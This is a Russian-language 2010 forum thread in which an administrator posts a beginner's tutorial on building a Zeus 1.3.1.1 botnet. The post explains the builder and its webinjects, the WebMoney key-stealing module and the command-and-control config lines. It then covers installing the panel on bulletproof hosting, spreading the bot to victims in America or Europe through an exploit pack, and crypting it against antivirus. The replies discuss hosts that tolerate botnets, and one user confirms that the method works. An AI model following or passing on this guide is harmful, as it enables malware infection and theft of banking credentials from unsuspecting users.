contact us rules avd support awards upload blog group gallery home


 


|LoadsSell.net - Мы продаем загрузки| |PlohihZagRusOK.net - у нас нет плохих загрузок| |installsmarket.net - качественные загрузки любых стран| |installsdealer.com - Ваши дилеры на рынке инсталлов| |ZagruzkiNah.Com - чоткие загрузы| |107928 - продаю загрузки|

 
Старый 17.10.2010   #1
Deymos

Администратор
 
Аватар для Deymos

Регистрация: 07.08.2009
Сообщений: 1,997
Поблагодарили всего: 797
за это сообщение: 7
По умолчанию Ботнет на базе Zeus 1.3.1.1

Как видно из названия статейки речь сегодня пойдет о создании собственного ботнета. Что такое ботнет я объяснять не буду так как об этом говорилось уже и не раз и не два. И так приступим

Введение

И так нам нужен билдер бота, в нашем случае это Zeus bild 1.3.1.1
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
как видно мы используем фейк от "b1sh0p" который был скомпилирован
"Build time: 19[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]17 23.08.2009 GMT" эту информацию мы видим в меню "Information" но нам нужно меню "Builder"
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
и так тут мы видим пусть до билдера, и 3 кнопки с помощью которого мы и будим создавать нашего бота!!!!

Немного о строении билдера:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
давайте ка я вам поясню что у нас тут что:

1. server[php] 1277 - это админ панель которая ставиться на хост... о ней мы поговорим позднее.
2. cfg1.bin - это резервный конфиг фаил который должен лежать на 2(резрвном абузоустойчивом сервере)
3. config.bin - наш основной конфиг который мы скоро будим генерить под свой хост.
4. config.txt - это и есть наш фаил настройки в котором мы будим прописывать все настройки бота, и в дальнейшем компилить билд.
5. webinjects.txt - это 1 из самых важных фаилов... Это сборка инжектов(грубо говоря инструкция какие поля и какие лини грабить)
6. modul.exe - это вебмани модуль который ворует серты ключики ну и всю лабуду связаную с вебмани(По ру не работайте не срите там где живете!)
7. zsb.exe - это наш билдер с помощью которого мы и будим настраивать бота!

И так приступим!!!!!
и так нажимаем кнопочку "Edit сonfig" мы видим:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
что открылся фаил "config.txt" который нам нужно отредактировать под свои нужны.

Расскажу вкратце что тут у нас и как:
(нужные нам поля в фаиле config.txt)

url_config "http://Твой_сайт/config.bin" - фаил конфига чтобы к которым боты коннектяться и получают инфу о изменении(например если ты переехал на другой абузоустойчивый сервер)
url_compip "http://Твой_сайт/cp.php" 1024 - Эта главная страница нашей админки по этому линку мы будим коннектиться и логиниться к админ панели.

url_loader "http://Твой_сайт/bot.exe" - это наш бот нужен он тут для того чтобы наши боты всегда были актуальны.
url_server "http://Твой_сайт/gate.php" - это тот скрипт который принимает отчеты от наших ботов.


encryption_key "sys_admin" - это ключик чтобы расшифровать то что нам прислали наши боты.

Ну вроде все больше нам тут нечего не нужно.

закрываем фаил config.txt с сохранением. ....

А вот нет кнопочку "Buil config" мы не жмем... нам нужен грамотный webinjects.txt который можно написать самому или купить у барыг на форумах!

выглядит он примерно так:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
И так когда мы заполучили грамотный webinjects.txt то можем жать кнопочку "Buil config" и получим на выходе:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
как раз таки необходимый нам "config.bin". Сохраняем его и идем дальше...

А дальше у нас кнопочка "Build loader" нажав на неё мы получим нашего бота который будит настроен на наш шайт и который будит брать настройки с "config.bin"... Выглядит это так:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
и так у нас теперь есть вирус и фаил для его полноценной работы...
подготовку мы закончили перейдем к основной части нашего замысла.

ЗЫ. не смотрите на мою свалку файлов в папке с билдером зевса... просто мне так удобней когда все под рукой))) все необходимые файлы я указал выше и дал описание к ним...


Установка админ панели

Админ панель нам нужно ставить на абузоустойчивый сервер чтобы если нашего бота спалят хостер не снес нашу админку и наши отчеты... Выбор абузы лежит полностью на ваших плечах.)))

фаилы нашей админ панели лежат в моем случае в папочке "server[php] 1277" и находиться там:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
и да хочу добавить что эту админ панель я модифицировал под себя...
в стандартной админке к билдеру 1.3.1.1 небыло фаила s.php(но в фаиле redir.php есть указание что этот фаил нам не обходим) так же в директории \system я добавил фаил fmt.php так как в фаиле s.php есть указание на этот файл(фаил s.php и fmt.php я взял из старой версии админ панели)... (Возможно эта модификация была лишней но почему-то боты мне не слали отчеты пока я не добавил эти файлы о_0)

И так выяснив из чего состоит админ панель нам надо её установить на наш абузоустойчивый сервер... залив все файлы на фтп(заливать нужно строго по тому линку который указали в config.txt например если ты залил [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] а в конфиге указал [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] то отчеты до тебя уже не дойдут!!!! БУДЬ ВНИМАТЕЛЕН) и так залив все фаилы на сервер идем по линку [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] прописываем все данные такие как логин и пароль до админки и данные для коннекта к базе данных... и так же не забываем указать правильный Encryption key: в нашем случае это sys_admin. Так же ставим флаги на Write reports to database и на Write reports to local path. это даст нам то что наши отчеты будут сохраняться как в базу так и в фаил...

И так если все установилось(а если все установилось то вы это увидите сами) при обращении к [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] мы увидим:


И так вводим логин и пароль указанный при установки админ панели и вуаля вы в админ панели...!!!!


ЗЫ. СЛЕДИТЕ ЗА ПРАВИЛЬНОСТЬЮ НАПИСАНИЯ ЛИНКОВ!!! ЭТО ЗАЛОГ УСПЕХА!!!!!
ЗЫЫ. Да кстати фаилы bot.exe и config.bin нам тоже надо залить на сервер.


Связка...

И так мы собрали бота и установили админ панель... возникает вопрос а что же нам делать дальше.... А дальше нам надо нашего бота впарить какому-нибудь дятлу желательно в Америке или Европе чтобы получить вкусных линкво)) и для этого мы будим использовать Связку эксплоитов... для этой статейки я выбрал более-менее нормальную связку под названием un-pack версии 1.5 выглядит эта прелесть так:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
как видно на скриншоте я прогрузил немного трафика и даже без перетяски связки она дает какой-то пробив о_0 меня самого это удивило когда я тестил связки но для новичков самое то!
И так что тут да как рассказывать лень да и хелп там хороший есть... единственный прикол в том что нужно найти фтп и проифреймить их... об этом я расскажу в другой статейки(в разработке обзор паблик связок создание из паблик связок своей полу приват связки и прогрузка трафика и крипт как exe так самой связки(для данной статейки я грузил не криптованные exe для более наглядной демонстрации))

и так мы видим что прогрузилось 4 уника и в админ панели мы видим:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
ну вот что то прогузилось и вот они отчеты за 10 дней(покаюсь там было ещё 1к отчетов я их удалил так как бота закосячил командами и он спалил что он протроянен и сменил все пароли...)

Ну вот вроде бы и все... Статейка ориентирована на новичков и имеет пару косяков(СДЕЛАНО СПЕЦИАЛЬНО ЧТОБЫ ВЫ УЧИЛИСЬ А НЕ СИДЕЛИ НА ВСЕМ ГОТОВОМ!!!!!!!!!!)


ЗЫ. Выбирайте норм связку и криптуйте EXE тогда успех вам гарантирован!!!!


Заключение...

И так мы сегодня рассмотрели как создать свой ботнет... как видите нечего тут сложного нету... НО вы столкнетесь с подводными течениями в которых вам придется разбираться самим...

Всем удачных экспериментов и хорошего прогруза!!!!!!


BuBliK for Carding.cc

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
__________________
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...][Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]- [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
Вы не те, за кого себя принимаете... (с) Deymos

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

Последний раз редактировалось darkest; 18.10.2010 в 14:21. Причина: )
Deymos вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Сказали спасибо:
RoMu4 (2 дн. назад), gtx008 (4 недель(и) назад), tst (18.10.2010), GENDELF (18.10.2010), Dave (17.10.2010), darkest (17.10.2010), dokzlo13 (17.10.2010)
Старый 17.10.2010   #2
S_I_D

Windows 98
 
Аватар для S_I_D

Регистрация: 26.10.2009
Адрес: localhost
Сообщений: 155
Поблагодарили всего: 43
за это сообщение: 0
Отправить сообщение для S_I_D с помощью ICQ
По умолчанию

Статья зачет
вот только какие права ставить на папки? и файлы...
и можно ли лепить на хостинг, но не абузоустойчевый
__________________
S_I_D вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 17.10.2010   #3
Deymos
автор данной темы

Администратор
 
Аватар для Deymos

Регистрация: 07.08.2009
Сообщений: 1,997
Поблагодарили всего: 797
за это сообщение: 0
По умолчанию

Цитата:
Сообщение от S_I_D Посмотреть сообщение
и можно ли лепить на хостинг, но не абузоустойчевый
вряд ли тебе разрешит хостер, закроет - даже не спросит
__________________
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...][Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]- [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
Вы не те, за кого себя принимаете... (с) Deymos

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
Deymos вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 17.10.2010   #4
S_I_D

Windows 98
 
Аватар для S_I_D

Регистрация: 26.10.2009
Адрес: localhost
Сообщений: 155
Поблагодарили всего: 43
за это сообщение: 0
Отправить сообщение для S_I_D с помощью ICQ
По умолчанию

Deymos, ну если ботов 200 будет...думаешь закроют?
я же не по 3к в день гружу, а по 3-4 штуки к примеру
__________________
S_I_D вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 19.10.2010   #5
travakur

Windows Vista
 
Аватар для travakur

Регистрация: 07.11.2009
Адрес: C:\WINDOWS\system32
Сообщений: 448
Поблагодарили всего: 123
за это сообщение: 0
Отправить сообщение для travakur с помощью ICQ
По умолчанию

Цитата:
Сообщение от S_I_D Посмотреть сообщение
Deymos, ну если ботов 200 будет...думаешь закроют?
я же не по 3к в день гружу, а по 3-4 штуки к примеру
я бы закрыл даже если бы вобще не рузили тока попадитесь, просто когда более 200 клиентов на сервере админ может не заметить ваш гейт, темболее если вы не создаете нагрузку и не приходят абузы так как вы не фига не грузите, купите пару к загрузок потом увидете как вас выгонят, но еслим хостер вобще в танке и пофиг че у него делают клиенты то радуйтесь что нашли такого хостера.
__________________
Качественный [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] для тех, кто любит свои сайты! VDS от 8$

Последний раз редактировалось travakur; 19.10.2010 в 03:38.
travakur вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 17.10.2010   #6
Deymos
автор данной темы

Администратор
 
Аватар для Deymos

Регистрация: 07.08.2009
Сообщений: 1,997
Поблагодарили всего: 797
за это сообщение: 0
По умолчанию

да чет хз даже, у нас тут люди продавали хостинг и в открытую писали что терпят такие вещи!
__________________
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...][Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]- [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
Вы не те, за кого себя принимаете... (с) Deymos

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
Deymos вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 17.10.2010   #7
kalibr98

Windows v.3.0

Регистрация: 28.03.2010
Сообщений: 36
Поблагодарили всего: 5
за это сообщение: 0
По умолчанию

видимо это антиабузнвй хостинг))

а статейка норм,для новичков потянет)
kalibr98 вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 17.10.2010   #8
sulaiman

Windows v.2.03

Регистрация: 11.10.2010
Сообщений: 17
Поблагодарили всего: 4
за это сообщение: 0
По умолчанию

Статейка норм... была когда-то...
Обычный хостинг потянет 150-250 ботов.
Не советую использовать зевса до 2.*.* версии, если не хотите в дальнейшем потерять ботнет. Да и билдер вы нигде уже не купите. Проект Зеус умер...

Последний раз редактировалось sulaiman; 17.10.2010 в 20:46. Причина: Добавлено сообщение
sulaiman вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 17.10.2010   #9
epiderm

Windows v.1.01

Регистрация: 30.09.2010
Сообщений: 2
Поблагодарили всего: 0
за это сообщение: 0
По умолчанию

Цитата:
Сообщение от sulaiman Посмотреть сообщение
...Проект Зеус умер...
Zeus перешёл в закрытый режим существует версии 3+, купить действительно невозможно по слухам 35к+
epiderm вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 18.10.2010   #10
olegteror

Почетный пользователь

Регистрация: 02.04.2010
Адрес: /dev/mozg >>/dev/null
Сообщений: 1,049
Поблагодарили всего: 1,035
за это сообщение: 0
Отправить сообщение для olegteror с помощью ICQ Отправить сообщение для olegteror с помощью Skype™
По умолчанию

Цитата:
Сообщение от Deymos Посмотреть сообщение
Ну вот вроде бы и все... Статейка орейнтирована на новечков и имеит пару косяков(ЗДЕЛАНО СПЕЦИАЛЬНО ЧТОБЫ ВЫ УЧИЛИСЬ А НЕ СИДЕЛИ НА ВСЕМ ГОТОВОМ!!!!!!!!!!)
Цитата:
Сообщение от sulaiman Посмотреть сообщение
Не советую использовать зевса до 2.*.* версии, если не хотите в дальнейшем потерять ботнет. Да и билдер вы нигде уже не купите. Проект Зеус умер...
Более того Проэкт Zeus Мертв ужо давно
__________________
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

Последний раз редактировалось olegteror; 19.10.2010 в 03:38.
olegteror вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 18.10.2010   #11
sulaiman

Windows v.2.03

Регистрация: 11.10.2010
Сообщений: 17
Поблагодарили всего: 4
за это сообщение: 0
По умолчанию

Хер ты угадал. Автор прекратил поддержку из-за недавней нашумевшей облавы фби и свалил. Подробностей не расрываю, но продукт будет существовать, только не таким, каким мы его знаем и не под этим именем.

Последний раз редактировалось sulaiman; 18.10.2010 в 00:43.
sulaiman вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 18.10.2010   #12
sulaiman

Windows v.2.03

Регистрация: 11.10.2010
Сообщений: 17
Поблагодарили всего: 4
за это сообщение: 0
По умолчанию

Тут ничего не было

Последний раз редактировалось olegteror; 19.10.2010 в 03:38.
sulaiman вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 4 дн. назад   #13
maulo

Windows v.3.0
 
Аватар для maulo

Регистрация: 19.11.2010
Адрес: http://www.Google.com/shell.php
Сообщений: 32
Поблагодарили всего: 3
за это сообщение: 0
Отправить сообщение для maulo с помощью ICQ
По умолчанию

посоветуйте бесплатний хостинг, ато на phpnet.us нехватает прав даже на билдер скуль бази
maulo на форуме  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 2 дн. назад   #14
RoMu4

Windows v.1.01
 
Аватар для RoMu4

Регистрация: 30.09.2010
Сообщений: 13
Поблагодарили всего: 9
за это сообщение: 0
По умолчанию

Спасибо , всё работает.
RoMu4 вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Ответ

Нижняя навигация
Вернуться   Fuck Anti Virus > Работаем с файлами > Статьи


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 

(Подробнее Тему прочитали: 80
aka Russian, alex, alkaed, alli2000, alx8787, bed, bertolai, brunotti, burn0ff, Chekit, ciberbox, cp9, cRv, cuker, darkest, datel, Dave, dazfx, denis187500, Deymos, dister, div, dokzlo13, dzhoka, electro, enr, epiderm, Ferut, firan12, GENDELF, GrammarNazi, gtx008, ihtr3, kalibr98, karamel1, kekx_plant, killyou, kirmanak, kukish, large-caliber, lexxel, lolka, look2009, maks2012, master008, maulo, napuk228, Neodigger, neoh, Ninja, olegteror, pynica, realzheka, Reptiliy, Rinax, ritkitoo, RoMu4, Samogon, seeilin, Sega71, Sergey_Morgan, Spacoom, sql100, sulaiman, sway1990, S_I_D, travakur, tst, users, vaj7, valman, vsemvsjonikomunichego, xakepok, XaMcTeR, xlooder, zip900, zippers, _minor_, _Stealer_
Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра
Комбинированный вид Комбинированный вид

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +4, время: 03:17.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd. Перевод: zCarot